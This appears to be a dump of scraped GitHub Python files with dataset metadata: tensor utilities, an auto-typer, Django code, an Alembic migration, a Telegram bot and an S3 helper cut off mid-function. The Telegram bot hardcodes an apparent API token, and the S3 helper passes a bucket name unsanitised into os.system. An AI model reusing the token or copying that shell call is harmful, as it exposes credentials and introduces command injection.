Tensor: Tensor to be sorted\n sort_column_id: int: index of column used for sorting\n Return ::\n (out_tensor, idx): Tuple: (Sorted Tensor, idx used for sorting)\n \"\"\"\n sort_column = inp_tensor[:, sort_column_id] \n _, idx = sort_column.sort()\n out_tensor = inp_tensor.index_select(0, idx)\n return (out_tensor, idx)\n\ndef tensor_elements_split(inp_tensor, to_pop, device=None, is_index=True):\n \"\"\"\n Pop elements from an input tensor\n Params ::\n inp_tensor: tensor: Input Tensor\n to_pop: array array like: \n collection of indexes or elements to pop from inp_tensor\n device: Torch.Device\n Device to store the tensors.\n is_index: Boolean: if set to True, to_pop is treated as indices. If False\n to_pop is treated as list of elements. Default is True\n Return ::\n Tuple(popped_tensor, popped_elements)\n popped_tensor: Tensor of type inp_tensor: Input tensor with the \n popped elements removed\n popped_elements: Tensor of type inp_tensor: Tensor of popped rows\n \n \"\"\"\n if device is None:\n device = torch.device(\"cpu\")\n if is_index is True:\n idx_to_keep = torch.tensor([id for id in range(inp_tensor.size(0)) \n if id not in to_pop], \n device=device, dtype=torch.long)\n if not torch.is_tensor(to_pop):\n to_pop = torch.tensor(to_pop, device=device, dtype=torch.long)\n popped_elements = inp_tensor.index_select(0, to_pop)\n popped_tensor = inp_tensor.index_select(0, idx_to_keep)\n\n else:\n raise NotImplementedError()\n return (popped_tensor, popped_elements)\n\ndef get_mean_absolute_error(X_test, y_test, gpr_model, y_mean=None, y_scale=None):\n \"\"\"\n y_true: torch Tensor\n True response.\n y_predicted: torch Tensor\n Predicted response.\n \n Returns\n -------\n float\n Mean Absolute Error\n\n \"\"\"\n with torch.no_grad():\n gpr_model.eval();\n posterior = gpr_model.posterior(X_test)\n abs_error = torch.abs(y_test - posterior.mean)\n if y_mean is not None and y_scale is not None:\n abs_error = abs_error * y_scale + y_mean\n return float(torch.mean(abs_error, axis=0).cpu().numpy())\n\ndef normalize_tensor(in_tensor, dim=0, mean_=None, std_deviation_=None):\n \"\"\"Normalize a vector\n\n Parameters\n ----------\n in_tensor: torch.Tensor\n Tensor to normalize.\n dim: int\n Dimension to normalize along. Only needed if the tensors own statistics\n is used to normalize it (mean_ and std_deviation_ not supplied). \n Default is 0.\n mean_: torch.Tensor\n Mean used to center the Tensor. Not needed if the tensors own statistics\n is used to normalize it.\n \n std_deviation_: torch.Tensor\n Standard deviation used to scale the Tensor. Not needed if the tensors \n own statistics is used to normalize it.\n \n Returns\n -------\n dict\n 'normalized': transformed tensor,\n 'std':\n 'mean':\n \n \"\"\" \n if mean_ is None or std_deviation_ is None:\n print('Normalizing vector using its own statistics')\n mean_ = in_tensor.mean(dim=dim)\n std_deviation_ = in_tensor.std(dim=dim)\n return {\n 'normalized': (in_tensor - mean_) / std_deviation_,\n 'std': std_deviation_,\n 'mean': mean_\n }\n\n\ndef scaleup_tensor(in_tensor, mean_, std_deviation_):\n \"\"\"Scaleup or \"un-normalize\" a tensor\n\n Parameters\n ----------\n in_tensor: torch.Tensor\n Tensor to normalize.\n\n mean_: torch.Tensor\n Mean used to re-center the Tensor. \n \n std_deviation_: torch.Tensor\n Standard deviation used to re-scale the Tensor.\n Returns\n -------\n torch.Tensor\n Scaledup Tensor.\n\n \"\"\"\n return in_tensor * std_deviation_ + mean_\n\n\n\ndef train_test_split(X, train_fraction, random_seed, y=None, device=None):\n train_size = int(train_fraction * X.shape[0]) \n \n np.random.seed(random_seed)\n initial_idx = list(np.random.choice(X.shape[0], \n train_size,\n replace=False))\n X_test, X_train = tensor_elements_split(X, to_pop=initial_idx, device=device)\n if y is not None:\n y_test, y_train = tensor_elements_split(y, \n to_pop=initial_idx, \n device=device)\n return X_train, X_test, y_train, y_test\n else:\n return X_train, X_test\n\ndef move_test_to_train(training_data, test_data, id_of_point_to_move):\n \"\"\" Move a point from test to training dataset\n \n Parameters\n ---------\n training_data: tuple\n (X_train, y_train).\n test_data: tuple\n (X_test, y_test)\n id_of_point_to_move: int\n Index of point to move from test to trainind set. \n Index is in reference to test data before operation.\n \n Returns\n -------\n tuple\n (X_train_new, y_train_new), (X_test_new, y_test_new)\n\n \"\"\"\n (X_train, y_train) = training_data\n (X_test, y_test) = test_data \n X_test_new, X_new = tensor_elements_split(inp_tensor=X_test,\n to_pop=id_of_point_to_move)\n y_test_new, y_new = tensor_elements_split(inp_tensor=y_test,\n to_pop=id_of_point_to_move)\n X_train_new = torch.cat((X_train, X_new))\n y_train_new = torch.cat((y_train, y_new))\n return (X_train_new, y_train_new), (X_test_new, y_test_new)\n\ndef get_new_point_to_acquire(acq_vals, test_data=None):\n max_acqf_id = acq_vals.argmax()\n if test_data is not None:\n (X_test, y_test) = test_data\n new_point_X = X_test.index_select(0, max_acqf_id)\n new_point_y = y_test.index_select(0, max_acqf_id)\n return (new_point_X, new_point_y), max_acqf_id\n else: \n return max_acqf_id\n\n\ndef detach_tensor_to_numpy(in_tensor):\n if torch.is_tensor(in_tensor):\n return in_tensor.detach().numpy()\n return in_tensor\n\n \n", "repo_name": "himaghna/phosphine-ligands", "sub_path": "active-learning/tensor_ops.py", "file_name": "tensor_ops.py", "file_ext": "py", "file_size_in_byte": 6278, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.device", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.is_tensor", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.is_tensor", "line_number": 190, "usage_type": "call"}]} +{"seq_id": "19663640352", "text": "import time\nimport threading\nimport os\nfrom pygame import mixer\nfrom pynput import keyboard\n\nTEXT_PATH = \"texts/\"\ndelay = 0.025\n\nkeys = {eval(f\"keyboard.Key.f{i+1}\"): \"\" for i in range(12)}\ntexts = []\nfor root, dirs, files in os.walk(TEXT_PATH):\n for i,x in enumerate(zip(files, keys)):\n file, key = x\n with open(os.path.join(TEXT_PATH, file), 'r') as f:\n keys[key] = f.read()\n \n\nmixer.init()\nmixer.music.load(\"typing.mp3\")\nmixer.music.set_volume(0.5)\n\n\nstopped = False\n\ndef type_text(text):\n global stopped\n mixer.music.play(-1)\n k = keyboard.Controller()\n for char in text:\n if char == \"\\n\":\n char = keyboard.Key.enter\n # elif char == \" \":\n # char = keyboard.Key.space\n k.press(char)\n time.sleep(delay)\n k.release(char)\n if stopped:\n break\n mixer.music.stop()\n \n\ndef on_press(key):\n global stopped\n if key in keys:\n stopped = False\n t = threading.Thread(target = type_text, args = [keys[key]])\n t.start()\n elif key == keyboard.Key.pause:\n stopped = True\n elif key == keyboard.Key.esc:\n listener.stop()\n\n\nwith keyboard.Listener(on_press=on_press) as listener:\n listener.join()", "repo_name": "SSSCodingClub/AutoClickerAndTyper", "sub_path": "main2.py", "file_name": "main2.py", "file_ext": "py", "file_size_in_byte": 1254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.walk", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.mixer.init", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 19, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 20, "usage_type": "name"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 21, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 28, "usage_type": "name"}, {"api_name": "pynput.keyboard.Controller", "line_number": 29, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 29, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 32, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "pygame.mixer.music.stop", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 40, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 47, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 49, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pynput.keyboard", "line_number": 51, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 55, "usage_type": "call"}, {"api_name": "pynput.keyboard", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "9835090550", "text": "from django import template\nfrom django.utils.safestring import mark_safe\nfrom django.template.loader import render_to_string\n\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef get_sniperlink_for_email(sniperlinks, email):\n if sniperlinks and email in sniperlinks:\n return sniperlinks[email]\n\n\n@register.simple_tag(takes_context=True)\ndef unverified_email_banner(context, banner_class=\"\", link_class=\"\"):\n sniperlinks = context['sniperlinks']\n context['banner_class'] = banner_class\n context['link_class'] = link_class\n html = ''\n # Check if the user has any unverified email addresses from allauth\n if sniperlinks:\n # Loop through the sniperlinks in the context.\n for email in sniperlinks:\n banner_context = context.flatten()\n link = sniperlinks[email]['link']\n if link:\n banner_context['email'] = email\n banner_context['link'] = link\n banner_context['img'] = sniperlinks[email]['img']\n html += render_to_string('allauth_sniperlinks/banner.html', banner_context)\n\n # Return the HTML as a safe string\n return mark_safe(html)\n", "repo_name": "skulegirl/django-allauth-sniperlinks", "sub_path": "allauth_sniperlinks/templatetags/sniperlink_tags.py", "file_name": "sniperlink_tags.py", "file_ext": "py", "file_size_in_byte": 1174, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.template.Library", "line_number": 6, "usage_type": "call"}, {"api_name": "django.template", "line_number": 6, "usage_type": "name"}, {"api_name": "django.template.loader.render_to_string", "line_number": 31, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "10114299163", "text": "import pandas as pd\nfrom django.db import connection\nfrom ..Utilitarios.Logs import Logs\n\n\nclass BD_Calificaciones:\n \n @staticmethod\n def consultaCalificacioneceb() -> pd.DataFrame:\n try:\n CONSULTA = \"\"\" SELECT eceb.ECX_FECHA,eceb.RUC_ENTIDAD,ef.ENTIDAD_NOMBRE,eceb.ECX_FIRMA_CAL_RIESGO,\n eceb.ECX_CALIFICACION,eceb.ECX_TIPO FROM ENTIDAD_CAL_EXT_BCO eceb \n INNER JOIN ENTIDAD_FINANCIERA ef on eceb.RUC_ENTIDAD = ef.RUC_ENTIDAD \"\"\"\n \n \n with connection.cursor() as cursor:\n cursor.execute(\"SET NOCOUNT ON\")\n cursor.execute(CONSULTA)\n resultado = cursor.fetchall()\n columnas = [col[0] for col in cursor.description]\n df = pd.DataFrame(resultado, columns=columnas)\n cursor.execute(\"SET NOCOUNT OFF\")\n return df\n except Exception:\n mensaje = \"Error al consultar Calificacion eceb\"\n Logs.registrarLog(mensaje)\n raise Exception(mensaje)\n \n \n @staticmethod\n def consultaCalificacionesecic() -> pd.DataFrame:\n try:\n CONSULTA = \"\"\" SELECT ecic.ECI_FECHA,ecic.RUC_ENTIDAD,ef.ENTIDAD_NOMBRE ,ecic.ECI_PUNTAJE,\n ecic.ECI_CALIFICACION,ecic.ECI_TIPO FROM ENTIDAD_CAL_INT_COAC ecic \n INNER JOIN ENTIDAD_FINANCIERA ef on ecic.RUC_ENTIDAD = ef.RUC_ENTIDAD \"\"\"\n \n \n with connection.cursor() as cursor:\n cursor.execute(\"SET NOCOUNT ON\")\n cursor.execute(CONSULTA)\n resultado = cursor.fetchall()\n columnas = [col[0] for col in cursor.description]\n df = pd.DataFrame(resultado, columns=columnas)\n cursor.execute(\"SET NOCOUNT OFF\")\n return df\n except Exception:\n mensaje = \"Error al consultar Calificacion ecic\"\n Logs.registrarLog(mensaje)\n raise Exception(mensaje)\n\n\n", "repo_name": "AlvaroValver-de/Api", "sub_path": "tesoreria_app/Persistencia/Calificaciones.py", "file_name": "Calificaciones.py", "file_ext": "py", "file_size_in_byte": 2075, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.db.connection.cursor", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 16, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 21, "usage_type": "call"}, {"api_name": "Utilitarios.Logs.Logs.registrarLog", "line_number": 26, "usage_type": "call"}, {"api_name": "Utilitarios.Logs.Logs", "line_number": 26, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.db.connection.cursor", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 38, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}, {"api_name": "Utilitarios.Logs.Logs.registrarLog", "line_number": 48, "usage_type": "call"}, {"api_name": "Utilitarios.Logs.Logs", "line_number": 48, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "13401761508", "text": "from ..node import Node, NodeType\nfrom ..types import TypeIdentifier, Dimensions\nfrom .expression import Expression\nfrom .array_expr import ArrayExpression\nfrom ..utils import throw_invalid_type\nfrom typing import List, Optional\n\n\nclass ArrayCreationExpression(Expression):\n\n def __init__(self,\n node_type: NodeType,\n type: TypeIdentifier,\n dimensions: Dimensions,\n value: Optional[ArrayExpression] = None):\n super().__init__(node_type)\n self.type_id = type\n self.dimensions = dimensions\n self.value = value\n self._check_types()\n\n def _check_types(self):\n if self.node_type != NodeType.ARRAY_CREATION_EXPR:\n throw_invalid_type(self.node_type, self)\n if self.type_id.node_type != NodeType.TYPE_IDENTIFIER:\n throw_invalid_type(self.type_id.node_type, self, 'type')\n if self.dimensions.node_type != NodeType.DIMENSIONS:\n throw_invalid_type(self.dimensions.node_type, self, 'dimensions')\n if (self.value is not None and self.value.node_type != NodeType.ARRAY_EXPR):\n throw_invalid_type(self.value.node_type, self, 'value')\n\n def get_children(self) -> List[Node]:\n res = [self.type_id, self.dimensions]\n if self.value is not None:\n res.append(self.value)\n return res\n\n def get_children_names(self) -> List[str]:\n return ['type_id', 'dimensions', 'value']\n", "repo_name": "YBRua/SrcMarker", "sub_path": "mutable_tree/nodes/expressions/array_creation_expr.py", "file_name": "array_creation_expr.py", "file_ext": "py", "file_size_in_byte": 1472, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "expression.Expression", "line_number": 9, "usage_type": "name"}, {"api_name": "node.NodeType", "line_number": 12, "usage_type": "name"}, {"api_name": "types.TypeIdentifier", "line_number": 13, "usage_type": "name"}, {"api_name": "types.Dimensions", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 15, "usage_type": "name"}, {"api_name": "array_expr.ArrayExpression", "line_number": 15, "usage_type": "name"}, {"api_name": "node.NodeType.ARRAY_CREATION_EXPR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "node.NodeType", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.throw_invalid_type", "line_number": 24, "usage_type": "call"}, {"api_name": "node.NodeType.TYPE_IDENTIFIER", "line_number": 25, "usage_type": "attribute"}, {"api_name": "node.NodeType", "line_number": 25, "usage_type": "name"}, {"api_name": "utils.throw_invalid_type", "line_number": 26, "usage_type": "call"}, {"api_name": "node.NodeType.DIMENSIONS", "line_number": 27, "usage_type": "attribute"}, {"api_name": "node.NodeType", "line_number": 27, "usage_type": "name"}, {"api_name": "utils.throw_invalid_type", "line_number": 28, "usage_type": "call"}, {"api_name": "node.NodeType.ARRAY_EXPR", "line_number": 29, "usage_type": "attribute"}, {"api_name": "node.NodeType", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.throw_invalid_type", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "node.Node", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}]} +{"seq_id": "5019070636", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom .models import CourseOrg, CityDict\n\nfrom pure_pagination import Paginator, EmptyPage, PageNotAnInteger\n# Create your views here.\n\n\nclass OrgView(View):\n '''\n 课程机构列表功能\n '''\n def get(self, request):\n # 课程机构\n all_orgs = CourseOrg.objects.all()\n # 热门机构的提取\n hot_orgs = all_orgs.order_by(\"click_num\")[:3]\n\n # 城市\n all_citys = CityDict.objects.all()\n\n # 去除筛选城市\n city_id = request.GET.get('city', \"\")\n if city_id:\n all_orgs = all_orgs.filter(city_id=int(city_id))\n # 类别筛选\n category = request.GET.get('ct', \"\")\n if category:\n all_orgs = all_orgs.filter(category=category)\n\n sort = request.GET.get ('sort', \"\")\n if sort:\n if sort == \"students\":\n all_orgs = all_orgs.order_by(\"-students\") # - 倒叙排序\n elif sort == \"courses\":\n all_orgs = all_orgs.order_by(\"-course_nums\")\n\n org_nums = all_orgs.count ()\n # 对课程机构进行分页\n try:\n page = request.GET.get ('page', 1)\n except PageNotAnInteger:\n page = 1\n # 必须设置每页显示的数量 per_page的值\n p = Paginator(all_orgs, 3,request=request)\n\n orgs = p.page (page)\n\n return render(request, \"org-list.html\", {\n \"all_orgs\": orgs,\n \"all_citys\": all_citys,\n \"org_nums\": org_nums,\n \"city_id\":city_id, # 传递city_id到templates中\n \"category\":category,\n \"hot_orgs\":hot_orgs,\n \"sort\":sort,\n })", "repo_name": "1mrliu/MxOnline", "sub_path": "apps/organization/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1800, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.views.generic.View", "line_number": 12, "usage_type": "name"}, {"api_name": "models.CourseOrg.objects.all", "line_number": 18, "usage_type": "call"}, {"api_name": "models.CourseOrg.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.CourseOrg", "line_number": 18, "usage_type": "name"}, {"api_name": "models.CityDict.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "models.CityDict.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.CityDict", "line_number": 23, "usage_type": "name"}, {"api_name": "pure_pagination.PageNotAnInteger", "line_number": 45, "usage_type": "name"}, {"api_name": "pure_pagination.Paginator", "line_number": 48, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "30312075289", "text": "import click\r\nfrom Bio import SeqIO\r\n\r\n@click.command()\r\n@click.option('--gb',help=\"The path of your genbank file.\")\r\n@click.option('--protein_fasta',help=\"The path of output protein fasta.\")\r\n@click.option('--gff',help=\"The path of output gff\")\r\n\r\n\r\ndef generate_MCScanX_input(gb,protein_fasta,gff):\r\n \"\"\"output protein fasta and simple gff.\"\"\"\r\n fw01 = open(protein_fasta,'w')\r\n fw02 = open(gff,'w')\r\n seq_ids = []\r\n for rec in SeqIO.parse(gb,'gb'):\r\n for feature in rec.features:\r\n if feature.type == \"CDS\" and feature.qualifiers['gene'][0] != 'rps12':\r\n protein_seq = feature.extract(rec.seq).translate()\r\n seq_id = feature.qualifiers['gene'][0]\r\n if seq_id not in seq_ids:\r\n seq_ids.append(seq_id)\r\n fw01.write(\">%s\\n%s\\n\"%(seq_id,str(protein_seq).replace(\"*\",\"\")))\r\n \r\n start = feature.location.start + 1\r\n \r\n end = feature.location.end\r\n \r\n chromosome = rec.annotations['organism'].replace(' ','_')\r\n \r\n fw02.write(\"%s\\t%s\\t%d\\t%d\\n\"%(chromosome,seq_id,start,end))\r\n \r\n fw01.close();fw02.close()\r\n \r\n click.echo(f\"Well done, you got { protein_fasta } and { gff }!\")\r\n \r\nif __name__ == '__main__':\r\n generate_MCScanX_input()", "repo_name": "NotebookOFXiaoMing/pomeChloroplast", "sub_path": "08.cosynteny/generate_MCScanX_input.py", "file_name": "generate_MCScanX_input.py", "file_ext": "py", "file_size_in_byte": 1436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 15, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 15, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 34, "usage_type": "call"}, {"api_name": "click.command", "line_number": 4, "usage_type": "call"}, {"api_name": "click.option", "line_number": 5, "usage_type": "call"}, {"api_name": "click.option", "line_number": 6, "usage_type": "call"}, {"api_name": "click.option", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "11984212319", "text": "import openai\n\nENGINE = 'text-davinci-003'\nMAX_TOKENS = 1500\nTEMPERATURE = 0.0\ndef complete(prompt):\n completion = openai.Completion.create(\n engine=ENGINE,\n prompt=prompt,\n max_tokens=MAX_TOKENS,\n temperature=TEMPERATURE,\n stream=False,\n )\n\n return completion['choices'][0]['text']", "repo_name": "RafaelCosman/autocoder", "sub_path": "llm_interface.py", "file_name": "llm_interface.py", "file_ext": "py", "file_size_in_byte": 326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "openai.Completion.create", "line_number": 7, "usage_type": "call"}, {"api_name": "openai.Completion", "line_number": 7, "usage_type": "attribute"}]} +{"seq_id": "74933284009", "text": "\"\"\"status and type are added\n\nRevision ID: 44db2275fc7f\nRevises: 59a1a716bd4b\nCreate Date: 2022-09-23 21:45:39.094275\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '44db2275fc7f'\ndown_revision = '59a1a716bd4b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n status_choice_enum = postgresql.ENUM('pending', 'checked', 'approved', 'finished', 'confirmed', name='statuschoice', create_type=False)\n status_choice_enum.create(op.get_bind(), checkfirst=True)\n\n type_choice_enum = postgresql.ENUM('with_self', 'with_budget', name='typechoice', create_type=False)\n type_choice_enum.create(op.get_bind(), checkfirst=True)\n\n op.add_column('client_shtatkas', sa.Column('status', status_choice_enum, nullable=True))\n op.add_column('client_shtatkas', sa.Column('type', type_choice_enum, nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('client_shtatkas', 'type')\n op.drop_column('client_shtatkas', 'status')\n # ### end Alembic commands ###\n", "repo_name": "bakhtiyorovdilshod/shtatka", "sub_path": "migrations/versions/44db2275fc7f_status_and_type_are_added.py", "file_name": "44db2275fc7f_status_and_type_are_added.py", "file_ext": "py", "file_size_in_byte": 1234, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.postgresql.ENUM", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.postgresql", "line_number": 24, "usage_type": "name"}, {"api_name": "alembic.op.get_bind", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 25, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 34, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 34, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 35, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "5737330115", "text": "import telebot\nfrom main import predict\n\nTOKEN = '6100411855:AAGRq3PAPIkUgMlxmpfWudXDfU8n3uTqmj80'\nbot = telebot.TeleBot(TOKEN)\n\n\n@bot.message_handler(content_types=['text'])\ndef get_text_messages(message):\n print_user(message)\n ans = predict(message.text)\n bot.send_message(message.from_user.id, ans)\n\n\ndef print_user(message):\n print(message.from_user.full_name, message.text, message.from_user.username)\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True, interval=0)\n", "repo_name": "Murloc02/URL_Checker", "sub_path": "Telebot.py", "file_name": "Telebot.py", "file_ext": "py", "file_size_in_byte": 492, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "telebot.TeleBot", "line_number": 5, "usage_type": "call"}, {"api_name": "main.predict", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "22618637633", "text": "import os, pathlib, shutil, subprocess\nfrom pathlib import Path\nfrom os.path import expanduser\nfrom datetime import datetime\nfrom botocore.exceptions import ClientError\n\nclass S3helper:\n \"\"\"\n author:\n - Chris Falck: chris.falck@tickboxconsulting.com\n params:\n - prefix: pattern to match in s3\n - local: local path to folder in which to place files\n - bucket: s3 bucket with target contents\n - client: initialised s3 client object\n - preserve_dirs: bool to determine if s3 dir structure is preserved\n \"\"\"\n\n def __init__(self, prefix, local, bucket, client, preserve_dirs):\n self.prefix = prefix\n self.local = local\n self.bucket = bucket\n self.client = client\n self.preserve_dirs = preserve_dirs\n self.next_token = ''\n\n def tree(self):\n \"\"\"\n list objects\n \"\"\"\n base_kwargs = {\n 'Bucket':self.bucket,\n 'Prefix':self.prefix,\n }\n dirs = []\n keys = []\n tmp_file = 'tree_file'\n\n while self.next_token is not None:\n kwargs = base_kwargs.copy()\n if self.next_token != '':\n kwargs.update({'ContinuationToken': self.next_token})\n\n try:\n results = self.client.list_objects_v2(**kwargs)\n except ClientError as error:\n print(\"A Client exception occurred: %s\" % error)\n return error\n\n contents = results.get('Contents')\n\n home = expanduser('~')\n today = datetime.today().strftime('%Y-%m-%d')\n dl_path = os.path.join(home, \"delete-later-\"+today, self.bucket)\n\n pathlib.Path(dl_path).mkdir(parents=True, exist_ok=True)\n\n dl_path += os.sep\n\n for i in contents:\n k = i.get('Key')\n if k[-1] != '/':\n keys.append(k)\n else:\n dirs.append(k)\n self.next_token = results.get('NextContinuationToken')\n \n for d in dirs:\n dest_pathname = os.path.join(dl_path, d)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n for k in keys:\n dest_pathname = os.path.join(dl_path, k)\n if not os.path.exists(os.path.dirname(dest_pathname)):\n os.makedirs(os.path.dirname(dest_pathname))\n Path(dl_path+k).touch()\n \n dl_path = dl_path[:-1]\n dl_path_arr = dl_path.split(os.sep)\n change2dir = os.sep.join(dl_path_arr[:-1])\n os.chdir(change2dir)\n \n os.system(\"tree \"+ self.bucket + \"> \" + self.local + \"/\" + tmp_file)\n with open(self.local + \"/\" + tmp_file, 'r') as file:\n data = file.read()\n file.close()\n\n shutil.rmtree(change2dir)\n os.remove(self.local + \"/\" + tmp_file)\n\n return(data)\n\n def download_dir(self):\n \"\"\"\n - Download objects from s3 matching the provided prefix\n - S3 Object paths can be preserved by setting 'preserve_dirs' to True\n - S3 Object paths can be removed by setting 'preserve_dirs' to False\n - If 'preserve_dirs' is False, all matched objects will be written directly\n to the 'local' directory\n \"\"\"\n\n keys = []\n dirs = []\n base_kwargs = {\n 'Bucket':self.bucket,\n 'Prefix':self.prefix,\n }\n\n while self.next_token is not None:\n kwargs = base_kwargs.copy()\n if self.next_token != '':\n kwargs.update({'ContinuationToken': self.next_token})\n\n try:\n results = self.client.list_objects_v2(**kwargs)\n except ClientError as error:\n print(\"A Client exception occurred: %s\" % error)\n return error\n\n contents = results.get('Contents')\n\n for i in contents:\n k = i.get('Key')\n if k[-1] != '/':\n keys.append(k)\n else:\n dirs.append(k)\n self.next_token = results.get('NextContinuationToken')\n if self.preserve_dirs:\n for d in dirs:\n 